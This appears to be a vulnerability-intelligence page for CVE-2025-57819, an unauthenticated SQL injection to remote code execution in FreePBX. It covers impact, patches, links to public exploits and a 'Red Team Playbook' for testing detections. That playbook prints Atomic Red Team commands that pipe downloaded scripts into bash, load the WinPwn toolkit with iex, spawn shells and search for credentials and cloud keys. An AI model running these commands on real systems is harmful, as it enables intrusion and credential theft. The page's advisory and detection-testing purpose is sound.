CVE-2025-57819
Overview
This vulnerability is an unauthenticated SQL injection in the FreePBX endpoint module caused by insufficient sanitization of user-supplied input. The flaw resides in the handling of parameters within the /admin/ajax.php endpoint, specifically in the 'brand' parameter used in database queries. This improper input validation allows injection of arbitrary SQL commands affecting the database layer of FreePBX versions 15, 16, and 17 endpoints.
Vulnerability Description
FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
Impact
An unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL commands, manipulate the FreePBX database, and upload malicious PHP files to the web server. This enables full remote code execution and complete system compromise without any user interaction or valid credentials. The attacker gains administrative-level control over the FreePBX system, potentially leading to data breaches, service disruption, and lateral movement within the affected network environment.
Solution
Apply the patches released by Sangoma for FreePBX endpoint versions 15.0.66, 16.0.89, and 17.0.3 to remediate this vulnerability. Detailed patch instructions and advisory information are available at the official FreePBX security advisory page: https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203. Implementing these updates will ensure proper input sanitization and prevent unauthorized database manipulation and remote code execution.
EPSS vs KEV Prediction — Evolution (30 days)
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sangoma | Freepbx | All |
cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
|
|
|
Sangoma | Freepbx | All |
cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
|
|
|
Sangoma | Freepbx | All |
cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
FreePBX ajax.php unauthenticated SQLi to RCE
exploits/unix/http/freepbx_unauth_sqli_to_rce
|
Echo_Slow, Piotr Bazydlo, Sonny | Unknown | linux | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| FreePBX 17.0.2 - Remote Code Execution (RCE) | Jared Brits | webapps | multiple | - | View |
GitHub PoCs (32)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
|
watchtowrlabs | 30 | 8 | 2025-09-08 | View |
|
0xEhab/FreePBX-CVE-2025-57819-RCE
|
0xEhab | 17 | 0 | 2026-06-06 | View |
|
blueisbeautiful/CVE-2025-57819
FreePBX SQL Injection Exploit
|
blueisbeautiful | 7 | 6 | 2025-09-01 | View |
|
MuhammadWaseem29/SQL-Injection-and-RCE_CVE-2025-57819
FreePBX versions 15, 16, and 17 contain a Remote Code Execution (RCE) vulnerability caused by insufficient sanitization ...
|
MuhammadWaseem29 | 8 | 2 | 2025-09-12 | View |
|
b4sh2/CVE-2025-57819-poc
CVE-2025-57819 -> rce
|
b4sh2 | 7 | 2 | 2026-06-06 | View |
|
brokendreamsclub/CVE-2025-57819
FreePBX SQL Injection Exploit
|
brokendreamsclub | 3 | 4 | 2025-09-01 | View |
|
cybertechajju/cve-2025-57819
Detects vulnerable FreePBX versions affected by CVE-2025-57819.
|
cybertechajju | 6 | 0 | 2025-08-30 | View |
|
K3ysTr0K3R/CVE-2025-57819
CVE-2025-57819 - FreePBX Unauthenticated Remote Code Execution (RCE)
|
K3ysTr0K3R | 3 | 0 | 2026-07-02 | View |
|
ImBIOS/lab-cve-2025-57819
FreePBX CVE-2025-57819 lab (Docker) + Nuclei POC for unauth SQLi (time-based).
|
ImBIOS | 1 | 2 | 2025-09-04 | View |
|
ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
Full-chain CVE-2025-57819 PoC for FreePBX 15, 16, and 17: unauthenticated SQLi to RCE and root takeover.
|
ozcanpng | 2 | 0 | 2026-06-18 | View |
|
Jeanback1/CVE-2025-57819-exploit
FreePBX Pre-Auth SQLi to RCE (CVE-2025-57819) — All-in-One Exploit
|
Jeanback1 | 2 | 0 | 2026-06-07 | View |
|
orange0Mint/CVE-2025-57819_FreePBX
This repository includes two PoC scripts for CVE-2025-57819 in FreePBX: one to create a new admin user (poc_admin.py), a...
|
orange0Mint | 2 | 0 | 2025-09-18 | View |
|
rxerium/CVE-2025-57819
Detection for CVE-2025-57819
|
rxerium | 1 | 1 | 2025-08-28 | View |
|
YuvrajSHAD/FreePBX-CVE-2025-57819
Unauthenticated SQL Injection to Remote Code Execution in FreePBX — CVE-2025-57819
|
YuvrajSHAD | 1 | 0 | 2026-06-08 | View |
|
xV4nd3Rx/CVE-2025-57819_FreePBX-PoC
Safe, read-only SQL Injection checker for FreePBX (CVE-2025-57819), using error/boolean/time-based techniques with per-p...
|
xV4nd3Rx | 1 | 0 | 2025-09-14 | View |
|
net-hex/CVE-2025-57819
A write up of CVE-2025-57819, a vulnerability affecting FreePBX 15, 16, and 17
|
net-hex | 1 | 0 | 2025-09-02 | View |
|
foxcornlab/freepbx-rce-detector
Triage scanner for CVE-2025-57819 (FreePBX Endpoint Manager unauthenticated SQLi to RCE). Detection only, no payloads.
|
foxcornlab | 0 | 0 | 2026-10-08 | View |
|
kelltich-756/FreePBX-Breaker
PoC and automated code to exploit CVE-2025-57819 in FreePBX. It demonstrates the Remote Code Execution (RCE) vulnerabili...
|
kelltich-756 | 0 | 0 | 2026-10-05 | View |
|
TheScriptKiddoz/FreePBX-SQLi-RCE
CVE-2025-57819 FreePBX SQLi RCE PoC
|
TheScriptKiddoz | 0 | 0 | 2026-06-24 | View |
|
donggle0802-code/cve-2025-57819
Docker CTF challenge for CVE-2025-57819
|
donggle0802-code | 0 | 0 | 2026-09-23 | View |
|
RokuSec/FreePBX-SQLi-RCE
CVE-2025-57819 FreePBX SQLi RCE PoC
|
RokuSec | 0 | 0 | 2026-06-24 | View |
|
shivammittal2403/cve-2025-57819-freepbx-range
Isolated educational FreePBX-compatible cyber range for CVE-2025-57819 (CWE-89/CWE-288). Docker lab — not official Sango...
|
shivammittal2403 | 0 | 0 | 2026-09-17 | View |
|
r3vpwnx/CVE-2025-57819
CVE-2025-57819 - FreePBX 16 Endpoint Manager unauthenticated SQL injection to RCE (PoC)
|
r3vpwnx | 0 | 0 | 2026-09-06 | View |
|
DiegoRivas1/htb-labs-connected
Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege...
|
DiegoRivas1 | 0 | 0 | 2026-08-27 | View |
|
TeteREN/CVE-2025-57819-RCE
CVE-2025-57819-RCE_PoC
|
TeteREN | 0 | 0 | 2026-08-01 | View |
|
Neobee714/CVE-2025-57819-POC
FreePBX 未认证SQL注入导致远程代码执行,FreePBX 15 (低于 15.0.66)、16 (低于 16.0.89)、17 (低于 17.0.3)。该漏洞位于商业化“endpoint”模块中,因对用户输入过滤不严,允许未认证的攻...
|
Neobee714 | 0 | 0 | 2026-07-20 | View |
|
Samik-Parajuli/htb-connected-writeup
Writeup for HackTheBox Connected — FreePBX CVE-2025-57819 SQLi + incron privesc
|
Samik-Parajuli | 0 | 0 | 2026-07-14 | View |
|
Its1Zero/cve-2025-57819-exploit
|
Its1Zero | 0 | 0 | 2026-07-01 | View |
|
JazzTheRabbit/FreePBX-SQLi-RCE
CVE-2025-57819 FreePBX SQLi RCE PoC
|
JazzTheRabbit | 0 | 0 | 2026-06-24 | View |
|
0xyngtg/FreePBX-CVE-2025-57819-CVE-2025-61678
Chains CVE-2025-57819 (stacked query SQL injection) and CVE-2025-61678 (authenticated file upload in FreePBX Endpoint Ma...
|
0xyngtg | 0 | 0 | 2026-06-12 | View |
|
jf-gondim/freepbx-endpoint-sqli-rce
Unauthenticated SQL injection in FreePBX Endpoint Manager (CVE-2025-57819) that injects a cron-scheduled PHP webshell fo...
|
jf-gondim | 0 | 0 | 2026-06-07 | View |
|
Sucuri-Labs/CVE-2025-57819-ioc-check
This is repository contains a script to check for current IOCs listed in the freepbx forum topic of the CVE-2025-57819
|
Sucuri-Labs | 0 | 0 | 2025-08-29 | View |
Threat Feed
34 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Active exploitation confirmed with 543 sighting(s)
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
59 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
for pid in $(pgrep -f 'Runner.Worker|Runner.Listener|runsvc|run.sh' 2>/dev/null); do tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep -iE 'env|ssh'; done
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path} -maxdepth 6 -name "#{filename}" -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.aws/#{filename}' -type f 2>/dev/null
find #{file_path} -path '*/.azure/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.docker/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.config/gcloud/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /root -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find /etc/kubernetes -name '*.conf' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for filename in #{filenames}; do find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null; done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
for filename in #{filenames}; do
find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null
done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /etc/mysql -name 'my.cnf' -type f #{optional_flags} 2>/dev/null
find /etc/redis -name 'redis.conf' -type f #{optional_flags} 2>/dev/null
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-57819 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h |
| community.freepbx.org |
GitHub CVE
x_refsource_MISC
|
https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203 |
| github.com |
NVD API
Exploit
Third Party Advisory
|
https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-57819 |